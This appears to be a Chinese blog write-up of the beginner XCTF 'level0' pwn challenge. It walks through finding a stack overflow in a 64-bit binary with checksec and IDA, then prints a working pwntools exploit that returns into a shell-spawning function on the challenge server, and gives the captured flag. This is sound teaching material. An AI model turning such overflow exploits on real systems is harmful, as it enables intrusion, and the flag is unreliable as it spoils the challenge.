XCTF:level0[WriteUP]

PWN入门题目:XCTF攻防世界的level0

使用file、checksec命令查看文件详细信息

这是一个64bit的ELF文件(后面编写EXP需要用到)

从checksec中展示的信息看,该二进制文件只开启了NX(数据执行保护)

这样的话就约等于没设防了(新手题难度)


使用IDA对该文件进行反编译

在主函数发现了一个vulnerable_function函数

双击该函数进行审计

buf数组分配了0x80个字节量,而总读取的是0x200个字节,所以考虑栈溢出

按F5查看该函数伪代码

从伪代码模式看可读性更高,read函数将读取0x200个字节

双击buf数组,查看其栈空间

 

我们创造的数据需要覆盖:buf数组+返回地址+寄存器

也就是说构造数据字节数应该等于buf+r+s=80+0+8=0x88字节


审计该文件的其他函数

发现函数callsystem(名字很可疑)

双击打开后对该函数进行反编译发现

这个函数的作用就只是返回一个shell,那么我们栈溢出的目标就很明确了

 

查看该函数的地址:


编写EXP进行漏洞利用

from pwn import *

shell = remote('61.147.171.105','64456') #建立连接

payload = b'a'*0x88 #构造无用数据使栈溢出

payload += p64(0x400596) #64bit文件使用p64并带上callsystem的地址

shell.send(payload) #发送payload

shell.interactive() #与反弹shell交互

 拖到linux终端中运行,获取flag


cyberpeace{ee84d30badc9105389d6fb50e6468e9d} 

  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值